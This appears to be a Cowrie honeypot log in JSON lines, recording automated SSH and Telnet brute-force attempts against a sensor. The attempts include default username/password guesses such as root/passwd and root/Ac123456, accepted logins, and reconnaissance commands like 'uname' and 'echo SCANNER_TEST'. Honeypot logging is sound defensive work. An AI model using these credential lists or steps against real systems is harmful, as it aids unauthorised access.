{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:54:36.452508Z","src_ip":"45.125.211.194","session":"0a8cf23ea881"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:54:43.386739Z","src_ip":"212.227.235.229","session":"f1e7e81c1c30"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":50158,"dst_ip":"1.2.3.4","dst_port":22,"session":"7dc79d75f5e5","protocol":"ssh","message":"New connection: 45.125.211.194:50158 (1.2.3.4:22) [session: 7dc79d75f5e5]","sensor":"my-vps","timestamp":"2025-08-28T03:54:48.989694Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:54:49.020819Z","src_ip":"45.125.211.194","session":"7dc79d75f5e5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:54:49.209023Z","src_ip":"45.125.211.194","session":"7dc79d75f5e5"}
{"eventid":"cowrie.login.success","username":"root","password":"passwd","message":"login attempt [root/passwd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:54:50.035121Z","src_ip":"45.125.211.194","session":"7dc79d75f5e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:54:50.533315Z","src_ip":"45.125.211.194","session":"7dc79d75f5e5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:54:50.534162Z","src_ip":"45.125.211.194","session":"7dc79d75f5e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:54:50.748352Z","src_ip":"45.125.211.194","session":"7dc79d75f5e5"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:54:50.749454Z","src_ip":"45.125.211.194","session":"7dc79d75f5e5"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":14939,"dst_ip":"1.2.3.4","dst_port":22,"session":"98f1254562d8","protocol":"ssh","message":"New connection: 45.125.211.194:14939 (1.2.3.4:22) [session: 98f1254562d8]","sensor":"my-vps","timestamp":"2025-08-28T03:55:03.938959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:55:03.954248Z","src_ip":"45.125.211.194","session":"98f1254562d8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:55:04.153637Z","src_ip":"45.125.211.194","session":"98f1254562d8"}
{"eventid":"cowrie.login.failed","username":"yarn","password":"yarn","message":"login attempt [yarn/yarn] failed","sensor":"my-vps","timestamp":"2025-08-28T03:55:04.978878Z","src_ip":"45.125.211.194","session":"98f1254562d8"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:55:06.189723Z","src_ip":"45.125.211.194","session":"98f1254562d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46780,"dst_ip":"1.2.3.4","dst_port":23,"session":"f7508b576da5","protocol":"telnet","message":"New connection: 212.227.125.160:46780 (1.2.3.4:23) [session: f7508b576da5]","sensor":"my-vps","timestamp":"2025-08-28T03:55:14.715419Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T03:55:16.616075Z","src_ip":"212.227.125.160","session":"f7508b576da5"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":32266,"dst_ip":"1.2.3.4","dst_port":22,"session":"22f0ac1d3701","protocol":"ssh","message":"New connection: 45.125.211.194:32266 (1.2.3.4:22) [session: 22f0ac1d3701]","sensor":"my-vps","timestamp":"2025-08-28T03:55:18.838278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:55:18.865121Z","src_ip":"45.125.211.194","session":"22f0ac1d3701"}
{"eventid":"cowrie.session.closed","duration":4.179033279418945,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:55:18.894380Z","src_ip":"212.227.125.160","session":"f7508b576da5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:55:19.054459Z","src_ip":"45.125.211.194","session":"22f0ac1d3701"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46796,"dst_ip":"1.2.3.4","dst_port":23,"session":"c3749c10b650","protocol":"telnet","message":"New connection: 212.227.125.160:46796 (1.2.3.4:23) [session: c3749c10b650]","sensor":"my-vps","timestamp":"2025-08-28T03:55:19.058481Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:55:19.455367Z","src_ip":"212.227.125.160","session":"c3749c10b650"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:55:19.535346Z","src_ip":"212.227.125.160","session":"c3749c10b650"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2","message":"login attempt [test2/test2] failed","sensor":"my-vps","timestamp":"2025-08-28T03:55:19.951782Z","src_ip":"45.125.211.194","session":"22f0ac1d3701"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T03:55:20.987645Z","src_ip":"212.227.125.160","session":"c3749c10b650"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:55:21.161674Z","src_ip":"45.125.211.194","session":"22f0ac1d3701"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"2.6","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:55:22.138478Z","src_ip":"212.227.125.160","session":"c3749c10b650"}
{"eventid":"cowrie.session.closed","duration":3.0872437953948975,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:55:22.145755Z","src_ip":"212.227.125.160","session":"c3749c10b650"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41962,"dst_ip":"1.2.3.4","dst_port":23,"session":"808b60636e53","protocol":"telnet","message":"New connection: 212.227.125.160:41962 (1.2.3.4:23) [session: 808b60636e53]","sensor":"my-vps","timestamp":"2025-08-28T03:55:23.282346Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":64356,"dst_ip":"1.2.3.4","dst_port":22,"session":"86c27849787a","protocol":"ssh","message":"New connection: 45.125.211.194:64356 (1.2.3.4:22) [session: 86c27849787a]","sensor":"my-vps","timestamp":"2025-08-28T03:55:33.747491Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:55:33.754715Z","src_ip":"45.125.211.194","session":"86c27849787a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:55:33.958299Z","src_ip":"45.125.211.194","session":"86c27849787a"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle123","message":"login attempt [oracle/oracle123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:55:34.790458Z","src_ip":"45.125.211.194","session":"86c27849787a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:55:36.001096Z","src_ip":"45.125.211.194","session":"86c27849787a"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":46186,"dst_ip":"1.2.3.4","dst_port":22,"session":"78afd07179c6","protocol":"ssh","message":"New connection: 45.125.211.194:46186 (1.2.3.4:22) [session: 78afd07179c6]","sensor":"my-vps","timestamp":"2025-08-28T03:55:48.621393Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:55:48.635891Z","src_ip":"45.125.211.194","session":"78afd07179c6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:55:48.882117Z","src_ip":"45.125.211.194","session":"78afd07179c6"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456","message":"login attempt [guest/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:55:49.721625Z","src_ip":"45.125.211.194","session":"78afd07179c6"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:55:50.943622Z","src_ip":"45.125.211.194","session":"78afd07179c6"}
{"eventid":"cowrie.session.closed","duration":31.874990940093994,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:55:55.157264Z","src_ip":"212.227.125.160","session":"808b60636e53"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":28351,"dst_ip":"1.2.3.4","dst_port":22,"session":"aea142717cf0","protocol":"ssh","message":"New connection: 45.125.211.194:28351 (1.2.3.4:22) [session: aea142717cf0]","sensor":"my-vps","timestamp":"2025-08-28T03:56:03.431481Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:56:03.445036Z","src_ip":"45.125.211.194","session":"aea142717cf0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:56:03.645514Z","src_ip":"45.125.211.194","session":"aea142717cf0"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang","message":"login attempt [wang/wang] failed","sensor":"my-vps","timestamp":"2025-08-28T03:56:04.482770Z","src_ip":"45.125.211.194","session":"aea142717cf0"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:56:05.696253Z","src_ip":"45.125.211.194","session":"aea142717cf0"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":50519,"dst_ip":"1.2.3.4","dst_port":22,"session":"59453232d27f","protocol":"ssh","message":"New connection: 45.125.211.194:50519 (1.2.3.4:22) [session: 59453232d27f]","sensor":"my-vps","timestamp":"2025-08-28T03:56:18.190179Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:56:18.204347Z","src_ip":"45.125.211.194","session":"59453232d27f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:56:18.406166Z","src_ip":"45.125.211.194","session":"59453232d27f"}
{"eventid":"cowrie.login.failed","username":"www","password":"www123","message":"login attempt [www/www123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:56:19.230263Z","src_ip":"45.125.211.194","session":"59453232d27f"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:56:20.439931Z","src_ip":"45.125.211.194","session":"59453232d27f"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":48826,"dst_ip":"1.2.3.4","dst_port":22,"session":"01e9dc4f1c13","protocol":"ssh","message":"New connection: 45.125.211.194:48826 (1.2.3.4:22) [session: 01e9dc4f1c13]","sensor":"my-vps","timestamp":"2025-08-28T03:56:33.085082Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:56:33.136281Z","src_ip":"45.125.211.194","session":"01e9dc4f1c13"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:56:33.341017Z","src_ip":"45.125.211.194","session":"01e9dc4f1c13"}
{"eventid":"cowrie.login.success","username":"root","password":"Ac123456","message":"login attempt [root/Ac123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:56:34.185479Z","src_ip":"45.125.211.194","session":"01e9dc4f1c13"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:56:34.740382Z","src_ip":"45.125.211.194","session":"01e9dc4f1c13"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:56:34.741082Z","src_ip":"45.125.211.194","session":"01e9dc4f1c13"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:56:34.962031Z","src_ip":"45.125.211.194","session":"01e9dc4f1c13"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:56:34.963154Z","src_ip":"45.125.211.194","session":"01e9dc4f1c13"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":59163,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae7b28e5b6bb","protocol":"ssh","message":"New connection: 45.125.211.194:59163 (1.2.3.4:22) [session: ae7b28e5b6bb]","sensor":"my-vps","timestamp":"2025-08-28T03:56:47.804355Z"}
